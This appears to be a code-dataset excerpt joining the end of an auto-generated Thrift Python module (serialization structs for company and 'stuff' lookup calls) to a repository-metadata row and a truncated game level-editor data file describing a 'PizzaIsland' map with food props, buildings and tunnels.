all_structs.append(get_follow_stuff_by_company_result)
get_follow_stuff_by_company_result.thrift_spec = (
    (0, TType.LIST, 'success', (TType.STRUCT, [stuff_detail, None], False), None, ),  # 0
    (1, TType.STRUCT, 'e', [gen_exp, None], None, ),  # 1
)
class get_follow_company_by_stuff_args(object):
    """
    Attributes:
     - type_id
     - ssid

    """

    def __init__(self, type_id=None, ssid=None,):
        self.type_id = type_id
        self.ssid = ssid

    def read(self, iprot):
        if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
            iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 1:
                if ftype == TType.I64:
                    self.type_id = iprot.readI64()
                else:
                    iprot.skip(ftype)
            elif fid == 2:
                if ftype == TType.STRING:
                    self.ssid = iprot.readString().decode('utf-8', errors='replace') if sys.version_info[0] == 2 else iprot.readString()
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        if oprot._fast_encode is not None and self.thrift_spec is not None:
            oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
            return
        oprot.writeStructBegin('get_follow_company_by_stuff_args')
        if self.type_id is not None:
            oprot.writeFieldBegin('type_id', TType.I64, 1)
            oprot.writeI64(self.type_id)
            oprot.writeFieldEnd()
        if self.ssid is not None:
            oprot.writeFieldBegin('ssid', TType.STRING, 2)
            oprot.writeString(self.ssid.encode('utf-8') if sys.version_info[0] == 2 else self.ssid)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        return

    def __repr__(self):
        L = ['%s=%r' % (key, value)
             for key, value in self.__dict__.items()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
all_structs.append(get_follow_company_by_stuff_args)
get_follow_company_by_stuff_args.thrift_spec = (
    None,  # 0
    (1, TType.I64, 'type_id', None, None, ),  # 1
    (2, TType.STRING, 'ssid', 'UTF8', None, ),  # 2
)
class get_follow_company_by_stuff_result(object):
    """
    Attributes:
     - success
     - e

    """

    def __init__(self, success=None, e=None,):
        self.success = success
        self.e = e

    def read(self, iprot):
        if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
            iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 0:
                if ftype == TType.LIST:
                    self.success = []
                    (_etype143, _size140) = iprot.readListBegin()
                    for _i144 in range(_size140):
                        _elem145 = iprot.readString().decode('utf-8', errors='replace') if sys.version_info[0] == 2 else iprot.readString()
                        self.success.append(_elem145)
                    iprot.readListEnd()
                else:
                    iprot.skip(ftype)
            elif fid == 1:
                if ftype == TType.STRUCT:
                    # Instantiate the exception struct, then read into it.
                    self.e = gen_exp()
                    self.e.read(iprot)
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        if oprot._fast_encode is not None and self.thrift_spec is not None:
            oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
            return
        oprot.writeStructBegin('get_follow_company_by_stuff_result')
        if self.success is not None:
            oprot.writeFieldBegin('success', TType.LIST, 0)
            oprot.writeListBegin(TType.STRING, len(self.success))
            for iter146 in self.success:
                oprot.writeString(iter146.encode('utf-8') if sys.version_info[0] == 2 else iter146)
            oprot.writeListEnd()
            oprot.writeFieldEnd()
        if self.e is not None:
            oprot.writeFieldBegin('e', TType.STRUCT, 1)
            self.e.write(oprot)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        return

    def __repr__(self):
        L = ['%s=%r' % (key, value)
             for key, value in self.__dict__.items()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
all_structs.append(get_follow_company_by_stuff_result)
get_follow_company_by_stuff_result.thrift_spec = (
    (0, TType.LIST, 'success', (TType.STRING, 'UTF8', False), None, ),  # 0
    (1, TType.STRUCT, 'e', [gen_exp, None], None, ),  # 1
)
class get_related_stuff_args(object):
    """
    Attributes:
     - ssid

    """

    def __init__(self, ssid=None,):
        self.ssid = ssid

    def read(self, iprot):
        if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
            iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 1:
                if ftype == TType.STRING:
                    self.ssid = iprot.readString().decode('utf-8', errors='replace') if sys.version_info[0] == 2 else iprot.readString()
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        if oprot._fast_encode is not None and self.thrift_spec is not None:
            oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
            return
        oprot.writeStructBegin('get_related_stuff_args')
        if self.ssid is not None:
            oprot.writeFieldBegin('ssid', TType.STRING, 1)
            oprot.writeString(self.ssid.encode('utf-8') if sys.version_info[0] == 2 else self.ssid)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        return

    def __repr__(self):
        L = ['%s=%r' % (key, value)
             for key, value in self.__dict__.items()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
all_structs.append(get_related_stuff_args)
get_related_stuff_args.thrift_spec = (
    None,  # 0
    (1, TType.STRING, 'ssid', 'UTF8', None, ),  # 1
)
class get_related_stuff_result(object):
    """
    Attributes:
     - success
     - e

    """

    def __init__(self, success=None, e=None,):
        self.success = success
        self.e = e

    def read(self, iprot):
        if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
            iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 0:
                if ftype == TType.LIST:
                    self.success = []
                    (_etype150, _size147) = iprot.readListBegin()
                    for _i151 in range(_size147):
                        _elem152 = iprot.readString().decode('utf-8', errors='replace') if sys.version_info[0] == 2 else iprot.readString()
                        self.success.append(_elem152)
                    iprot.readListEnd()
                else:
                    iprot.skip(ftype)
            elif fid == 1:
                if ftype == TType.STRUCT:
                    # Instantiate the exception struct, then read into it.
                    self.e = gen_exp()
                    self.e.read(iprot)
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        if oprot._fast_encode is not None and self.thrift_spec is not None:
            oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
            return
        oprot.writeStructBegin('get_related_stuff_result')
        if self.success is not None:
            oprot.writeFieldBegin('success', TType.LIST, 0)
            oprot.writeListBegin(TType.STRING, len(self.success))
            for iter153 in self.success:
                oprot.writeString(iter153.encode('utf-8') if sys.version_info[0] == 2 else iter153)
            oprot.writeListEnd()
            oprot.writeFieldEnd()
        if self.e is not None:
            oprot.writeFieldBegin('e', TType.STRUCT, 1)
            self.e.write(oprot)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        return

    def __repr__(self):
        L = ['%s=%r' % (key, value)
             for key, value in self.__dict__.items()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
all_structs.append(get_related_stuff_result)
get_related_stuff_result.thrift_spec = (
    (0, TType.LIST, 'success', (TType.STRING, 'UTF8', False), None, ),  # 0
    (1, TType.STRUCT, 'e', [gen_exp, None], None, ),  # 1
)
fix_spec(all_structs)
del all_structs
| 34.915115 | 144 | 0.593993 | 7,127 | 63,755 | 5.028062 | 0.030167 | 0.015488 | 0.027878 | 0.023106 | 0.938719 | 0.914748 | 0.894907 | 0.866053 | 0.840547 | 0.829357 | 0 | 0.008846 | 0.304902 | 63,755 | 1,825 | 145 | 34.934247 | 0.799779 | 0.018681 | 0 | 0.834624 | 1 | 0 | 0.043634 | 0.013261 | 0 | 0 | 0 | 0 | 0 | 1 | 0.109782 | false | 0.00563 | 0.00563 | 0.033779 | 0.209008 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
ea80d6d1fc1d242a9170a055d0d9677271ce2e2e | 23,503 | py | Python | pirates/leveleditor/worldData/PizzaIsland.py | Willy5s/Pirates-Online-Rewritten | 7434cf98d9b7c837d57c181e5dabd02ddf98acb7 | ["BSD-3-Clause"] | 81 | 2018-04-08T18:14:24.000Z | 2022-01-11T07:22:15.000Z | pirates/leveleditor/worldData/PizzaIsland.py | Willy5s/Pirates-Online-Rewritten | 7434cf98d9b7c837d57c181e5dabd02ddf98acb7 | ["BSD-3-Clause"] | 4 | 2018-09-13T20:41:22.000Z | 2022-01-08T06:57:00.000Z | pirates/leveleditor/worldData/PizzaIsland.py | Willy5s/Pirates-Online-Rewritten | 7434cf98d9b7c837d57c181e5dabd02ddf98acb7 | ["BSD-3-Clause"] | 26 | 2018-05-26T12:49:27.000Z | 2021-09-11T09:11:59.000Z |
from pandac.PandaModules import Point3, VBase3, Vec4
objectStruct = {'AmbientColors': {},'DirectionalColors': {},'FogColors': {},'FogRanges': {},'Interact Links': [],'Locator Links': [['1157477467.36dxschafe', '1234560512.0akelts2', 'Bi-directional'], ['1234560512.0akelts3', '1235762221.72akelts', 'Bi-directional']],'Objects': {'1150922126.8dzlu': {'Type': 'Island','Name': 'PizzaIsland','File': '','Minimap': False,'Objects': {'1155695180.13sdnaik': {'Type': 'Port Collision Sphere','Name': 'PizzaPort','Hpr': VBase3(34.116, 0.0, 0.0),'Pos': Point3(2.887, 0.249, 0.0),'Scale': VBase3(125.209, 125.209, 125.209),'VisSize': '','Visual': {'Color': (0.5, 0.5, 1.0, 0.2),'Model': 'models/misc/smiley'}},'1160703177.58JB': {'Type': 'Interactive Prop','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-416.357, -1826.094, 4.65),'Scale': VBase3(1.0, 1.0, 1.0),'Visual': {'Model': 'models/props/dummy_zero'},'interactAble': 'player','interactType': 'hit'},'1162575677.17Shochet': {'Type': 'Locator Node','Name': 'portal_exterior_2','Hpr': VBase3(-42.929, -1.491, 2.305),'Parent Uid': '1150922126.8dzlu','Pos': Point3(12.838, -924.207, 46.228),'Scale': VBase3(1.0, 1.0, 1.0)},'1168493928.34kmuller': {'Type': 'Prop_Groups','DisableCollision': True,'GridPos': Point3(-1468.164, -3010.376, 193.197),'Hpr': VBase3(-156.501, 0.0, 0.0),'Pos': Point3(-729.161, -1976.411, 68.319),'Scale': VBase3(1.0, 1.0, 1.0),'Visual': {'Color': (0.47999998927116394, 0.44999998807907104, 0.4099999964237213, 1.0),'Model': 'models/props/prop_group_A'}},'1169577216.0dxschafe0': {'Type': 'Locator Node','Name': 'portal_exterior_3','Hpr': VBase3(175.735, 0.0, 0.0),'Parent Uid': '1150922126.8dzlu','Pos': Point3(758.091, -1814.26, 10.14),'Scale': VBase3(1.0, 1.0, 1.0)},'1172542336.0jubutler8': {'Type': 'Player Spawn Node','Hpr': VBase3(-26.668, 0.0, 0.0),'Index': -1,'Min Population': '1','Pos': Point3(1.452, -0.761, 1.0),'Priority': '1','Scale': VBase3(1.0, 1.0, 1.0),'SpawnDelay': '20','Spawnables': 'All','Team': '1','Visual': {'Model': 'models/misc/smiley'},'startingDepth': 
'12'},'1178941184.0JB': {'Type': 'Player Boot Node','AreaUid': '1157485774.64sdnaik','Hpr': VBase3(168.961, 0.0, 0.0),'Pos': Point3(-739.589, -1823.109, 25.99),'Scale': VBase3(1.0, 1.0, 1.0),'Visual': {'Color': (0.5, 1.0, 0.5, 1),'Model': 'models/misc/smiley'}},'1192581038.5akelts': {'Type': 'Military_props','DisableCollision': False,'Hpr': VBase3(116.029, 0.0, 0.0),'Pos': Point3(-733.366, -1970.781, 68.319),'Scale': VBase3(1.0, 1.0, 1.104),'Visual': {'Color': (0.69, 0.58, 0.47, 1.0),'Model': 'models/islands/pier_scaffold_stairs'}},'1193359744.0dxschafe0': {'Type': 'Spawn Node','AnimSet': 'default','Hpr': Point3(0.0, 0.0, 0.0),'Min Population': '1','Patrol Radius': '12.0000','Pause Chance': '100','Pause Duration': '30','Pos': Point3(0.0, 0.0, 0.0),'PoseAnim': '','PoseFrame': '','Scale': VBase3(1.0, 1.0, 1.0),'Spawnables': 'Low Navy','Start State': 'Patrol','StartFrame': '0','Team': 'default','TrailFX': 'None','Visual': {'Color': (0, 0, 0.65, 1),'Model': 'models/misc/smiley'}},'1219967635.89akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(-20.048, -67.875, 1.0),'Scale': VBase3(3.002, 3.002, 3.002),'VisZone': 'sausage','Visual': {'Model': 'models/props/sausage'}},'1219967645.94akelts': {'Type': 'Food','DisableCollision': False,'Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-10.749, -22.183, 1.0),'Scale': VBase3(3.002, 3.002, 3.002),'VisSize': '','VisZone': 'sausage','Visual': {'Model': 'models/props/sausage'}},'1219967701.58akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(-52.08, -53.96, 1.0),'Scale': VBase3(3.002, 3.002, 3.002),'VisZone': 'sausage','Visual': {'Model': 'models/props/sausage'}},'1219967702.73akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(-68.535, -13.929, 1.0),'Scale': VBase3(3.002, 3.002, 3.002),'VisZone': 'sausage','Visual': {'Model': 'models/props/sausage'}},'1219967703.58akelts': {'Type': 
'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(-33.426, -9.466, 1.0),'Scale': VBase3(3.002, 3.002, 3.002),'VisZone': 'sausage','Visual': {'Model': 'models/props/sausage'}},'1219967706.25akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(-40.058, -36.711, 1.0),'Scale': VBase3(3.002, 3.002, 3.002),'VisZone': 'sausage','Visual': {'Model': 'models/props/sausage'}},'1219967754.09akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(12.883, -9.472, 1.0),'Scale': VBase3(18.722, 18.722, 18.722),'VisZone': 'pepperoni','Visual': {'Model': 'models/props/greenbeanbasket'}},'1219967765.61akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(42.531, 20.561, 1.0),'Scale': VBase3(16.691, 16.691, 16.691),'VisZone': 'mushroom','Visual': {'Model': 'models/props/fishbasket'}},'1219967783.2akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(15.71, 14.133, 1.0),'Scale': VBase3(16.691, 16.691, 16.691),'VisSize': '','VisZone': 'mushroom','Visual': {'Model': 'models/props/fishbasket'}},'1219967783.72akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(24.93, 63.03, 1.0),'Scale': VBase3(16.691, 16.691, 16.691),'VisSize': '','VisZone': 'mushroom','Visual': {'Model': 'models/props/fishbasket'}},'1219967784.53akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(21.517, 36.79, 1.0),'Scale': VBase3(16.691, 16.691, 16.691),'VisSize': '','VisZone': 'mushroom','Visual': {'Model': 'models/props/fishbasket'}},'1219967786.83akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(54.018, 61.648, 1.0),'Scale': VBase3(16.691, 16.691, 16.691),'VisZone': 'mushroom','Visual': {'Model': 'models/props/fishbasket'}},'1219967791.12akelts': {'Type': 
'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(-14.676, 21.936, 1.0),'Scale': VBase3(16.691, 16.691, 16.691),'VisSize': '','VisZone': 'pineapple','Visual': {'Model': 'models/props/mangobasket'}},'1219967800.16akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(-26.679, 23.72, 1.0),'Scale': VBase3(16.691, 16.691, 16.691),'VisZone': 'pineapple','Visual': {'Model': 'models/props/mangobasket'}},'1219967801.34akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(-9.565, 36.257, 1.0),'Scale': VBase3(16.691, 16.691, 16.691),'VisZone': 'pineapple','Visual': {'Model': 'models/props/mangobasket'}},'1219967801.8akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(-61.911, 39.33, 1.0),'Scale': VBase3(16.691, 16.691, 16.691),'VisZone': 'pineapple','Visual': {'Model': 'models/props/mangobasket'}},'1219967802.26akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(-64.449, 10.839, 1.0),'Scale': VBase3(16.691, 16.691, 16.691),'VisZone': 'pineapple','Visual': {'Model': 'models/props/mangobasket'}},'1219967803.17akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(-30.277, 65.309, 1.0),'Scale': VBase3(16.691, 16.691, 16.691),'VisZone': 'pineapple','Visual': {'Model': 'models/props/mangobasket'}},'1219967803.53akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(-7.38, 72.276, 1.0),'Scale': VBase3(16.691, 16.691, 16.691),'VisZone': 'pineapple','Visual': {'Model': 'models/props/mangobasket'}},'1219967804.08akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(-46.939, 58.076, 1.0),'Scale': VBase3(16.691, 16.691, 16.691),'VisZone': 'pineapple','Visual': {'Model': 'models/props/mangobasket'}},'1219967825.34akelts': {'Type': 'Building 
Exterior','File': '','ExtUid': '1219967825.34akelts0','Hpr': VBase3(-20.344, 0.0, 0.0),'Pos': Point3(-42.939, -70.378, 1.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisIndex': 1,'VisSize': 'Large','Visual': {'Door': 'models/buildings/shanty_guildhall_door','Model': 'models/buildings/english_g','SignFrame': '','SignImage': 'models/buildings/sign1_eng_a_icon_barber'}},'1219967835.67akelts': {'Type': 'Building Exterior','File': '','ExtUid': '1219967835.67akelts0','Hpr': VBase3(-20.344, 0.0, 0.0),'Pos': Point3(31.29, 77.6, 1.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisIndex': 2,'VisSize': 'Large','Visual': {'Door': 'models/buildings/shanty_guildhall_door','Model': 'models/buildings/english_g','SignFrame': '','SignImage': 'models/buildings/sign1_eng_a_icon_barber'}},'1219967841.55akelts': {'Type': 'Building Exterior','File': '','ExtUid': '1219967841.55akelts0','Hpr': VBase3(46.578, 0.0, 0.0),'Pos': Point3(61.242, -59.937, 1.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisIndex': 3,'VisSize': 'Large','Visual': {'Door': 'models/buildings/shanty_guildhall_door','Model': 'models/buildings/english_g','SignFrame': '','SignImage': 'models/buildings/sign1_eng_a_icon_barber'}},'1219967846.48akelts': {'Type': 'Building Exterior','File': '','ExtUid': '1219967846.48akelts0','Hpr': VBase3(46.578, 0.0, 0.0),'Pos': Point3(-62.861, 59.68, 1.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisIndex': 4,'VisSize': 'Large','Visual': {'Door': 'models/buildings/shanty_guildhall_door','Model': 'models/buildings/english_g','SignFrame': '','SignImage': 'models/buildings/sign1_eng_a_icon_barber'}},'1219967941.09akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(16.0, -29.85, 1.001),'Scale': VBase3(18.722, 18.722, 18.722),'VisSize': '','VisZone': 'pepperoni','Visual': {'Model': 'models/props/greenbeanbasket'}},'1219967941.67akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(17.039, -66.826, 1.001),'Scale': VBase3(18.722, 18.722, 
18.722),'VisZone': 'pepperoni','Visual': {'Model': 'models/props/greenbeanbasket'}},'1219967943.19akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(64.274, -25.463, 1.001),'Scale': VBase3(18.722, 18.722, 18.722),'VisZone': 'pepperoni','Visual': {'Model': 'models/props/greenbeanbasket'}},'1219967943.7akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(46.57, -42.266, 1.001),'Scale': VBase3(18.722, 18.722, 18.722),'VisZone': 'pepperoni','Visual': {'Model': 'models/props/greenbeanbasket'}},'1219967944.26akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(41.863, -62.028, 1.001),'Scale': VBase3(18.722, 18.722, 18.722),'VisZone': 'pepperoni','Visual': {'Model': 'models/props/greenbeanbasket'}},'1219967945.2akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(31.384, -11.744, 1.001),'Scale': VBase3(18.722, 18.722, 18.722),'VisZone': 'pepperoni','Visual': {'Model': 'models/props/greenbeanbasket'}},'1219967946.76akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(77.044, -13.696, 1.001),'Scale': VBase3(18.722, 18.722, 18.722),'VisZone': 'pepperoni','Visual': {'Model': 'models/props/greenbeanbasket'}},'1219967951.66akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(-14.532, -43.87, 1.0),'Scale': VBase3(3.002, 3.002, 3.002),'VisZone': 'sausage','Visual': {'Model': 'models/props/sausage'}},'1219967952.39akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(-6.199, -7.695, 1.0),'Scale': VBase3(3.002, 3.002, 3.002),'VisZone': 'sausage','Visual': {'Model': 'models/props/sausage'}},'1219967952.83akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(-30.715, -23.562, 1.0),'Scale': VBase3(3.002, 3.002, 3.002),'VisZone': 
'sausage','Visual': {'Model': 'models/props/sausage'}},'1219967953.48akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(-62.772, -34.142, 1.0),'Scale': VBase3(3.002, 3.002, 3.002),'VisZone': 'sausage','Visual': {'Model': 'models/props/sausage'}},'1219967953.83akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(-52.025, -10.807, 1.0),'Scale': VBase3(3.002, 3.002, 3.002),'VisZone': 'sausage','Visual': {'Model': 'models/props/sausage'}},'1219967955.66akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(-21.554, -33.194, 1.0),'Scale': VBase3(3.002, 3.002, 3.002),'VisSize': '','VisZone': 'sausage','Visual': {'Model': 'models/props/sausage'}},'1219967957.7akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(-14.049, -58.385, 1.0),'Scale': VBase3(3.002, 3.002, 3.002),'VisZone': 'sausage','Visual': {'Model': 'models/props/sausage'}},'1219967959.91akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(-33.308, -51.626, 1.0),'Scale': VBase3(3.002, 3.002, 3.002),'VisZone': 'sausage','Visual': {'Model': 'models/props/sausage'}},'1228348366.44akelts': {'Type': 'Island Game Area','File': 'port_royal_area_MurkyHollow','Hpr': Point3(0.0, 0.0, 0.0),'Instanced': False,'Minimap': False,'Objects': {'1235762221.72akelts': {'Type': 'Locator Node','Name': 'portal_interior_1','GridPos': Point3(97.704, 1056.156, 98.293),'Hpr': Point3(0.0, 0.0, 0.0),'Parent Uid': '1228348366.44akelts','Pos': Point3(-456.179, 510.894, 93.701),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(553.883, 545.263, 4.592),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/misc/pir_m_are_cav_startingPlane'}},'1234560059.16akelts': {'Type': 'Tunnel Cap','DisableCollision': False,'Holiday': '','Hpr': VBase3(-246.921, 0.0, 0.0),'Objects': {'1157477467.36dxschafe': {'Type': 
'Locator Node','Name': 'portal_exterior_1','GridPos': Point3(85.737, 34.289, 4.673),'Hpr': VBase3(46.116, 0.0, 0.0),'Parent Uid': '1234560059.16akelts','Pos': Point3(0.683, 0.079, 0.081),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(85.397, 34.886, 4.592),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/tunnels/tunnelcap_cave_exterior'}},'1234560512.0akelts1': {'Type': 'Connector Tunnel','File': '','Hpr': VBase3(-90.15, 0.0, 0.0),'Objects': {'1234560512.0akelts2': {'Type': 'Locator Node','Name': 'portal_connector_1','GridPos': Point3(70.501, -28.75, 9.969),'Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1234560512.0akelts1','Pos': Point3(95.197, 150.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1234560512.0akelts3': {'Type': 'Locator Node','Name': 'portal_connector_2','GridPos': Point3(-29.073, 105.97, 9.095),'Hpr': VBase3(-90.0, 0.0, 0.0),'Parent Uid': '1234560512.0akelts1','Pos': Point3(8.658, 3.262, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(345.008, -12.056, 5.319),'Scale': VBase3(1.0, 1.0, 1.0),'Visual': {'Model': 'models/tunnels/tunnel_cave_left'}}},'Undockable': False,'VisSize': '','Visibility': 'Section','Visual': {'Model': 'models/islands/pizza_zero'}}},'Vis Table': {'mushroom': (['pepperoni', 'pineapple'], ['1219967825.34akelts', '1219967835.67akelts', '1219967841.55akelts', '1219967846.48akelts', '1234560512.0akelts1']),'pepperoni': (['sausage', 'mushroom'], ['1234560512.0akelts1']),'pineapple': (['sausage', 'mushroom'], ['1234560512.0akelts1']),'sausage': (['pepperoni', 'pineapple'], ['1234560512.0akelts1'])},'Node Links': [['1168748493.66joswilso', '1168748251.22joswilso', 'Bi-directional'], ['1168748490.2joswilso', '1168748251.22joswilso', 'Bi-directional'], ['1168748483.16joswilso', '1168748251.22joswilso', 'Bi-directional'], ['1176744320.0dxschafe', '1176744576.0dxschafe0', 'Bi-directional'], ['1176744320.0dxschafe', '1176745216.0dxschafe', 'Bi-directional'], ['1176744320.0dxschafe', '1176745216.0dxschafe0', 
'Bi-directional'], ['1176744320.0dxschafe', '1176755584.0dxschafe2', 'Bi-directional'], ['1176755712.0dxschafe', '1176744320.0dxschafe', 'Bi-directional'], ['1176744320.0dxschafe', '1176755712.0dxschafe0', 'Bi-directional']],'Layers': {'Collisions': ['1184008208.59kmuller', '1184016064.62kmuller', '1184013852.84kmuller', '1185822696.06kmuller', '1184006140.32kmuller', '1184002350.98kmuller', '1184007573.29kmuller', '1184021176.59kmuller', '1184005963.59kmuller', '1188324241.31akelts', '1184006537.34kmuller', '1184006605.81kmuller', '1187139568.33kmuller', '1188324186.98akelts', '1184006730.66kmuller', '1184007538.51kmuller', '1184006188.41kmuller', '1184021084.27kmuller', '1185824396.94kmuller', '1185824250.16kmuller', '1185823630.52kmuller', '1185823760.23kmuller', '1185824497.83kmuller', '1185824751.45kmuller', '1187739103.34akelts', '1188323993.34akelts', '1184016538.29kmuller', '1185822200.97kmuller', '1184016225.99kmuller', '1195241421.34akelts', '1195242796.08akelts', '1184020642.13kmuller', '1195237994.63akelts', '1184020756.88kmuller', '1184020833.4kmuller', '1185820992.97kmuller', '1185821053.83kmuller', '1184015068.54kmuller', '1184014935.82kmuller', '1185821432.88kmuller', '1185821701.86kmuller', '1195240137.55akelts', '1195241539.38akelts', '1195238422.3akelts', '1195238473.22akelts', '1185821453.17kmuller', '1184021269.96kmuller', '1185821310.89kmuller', 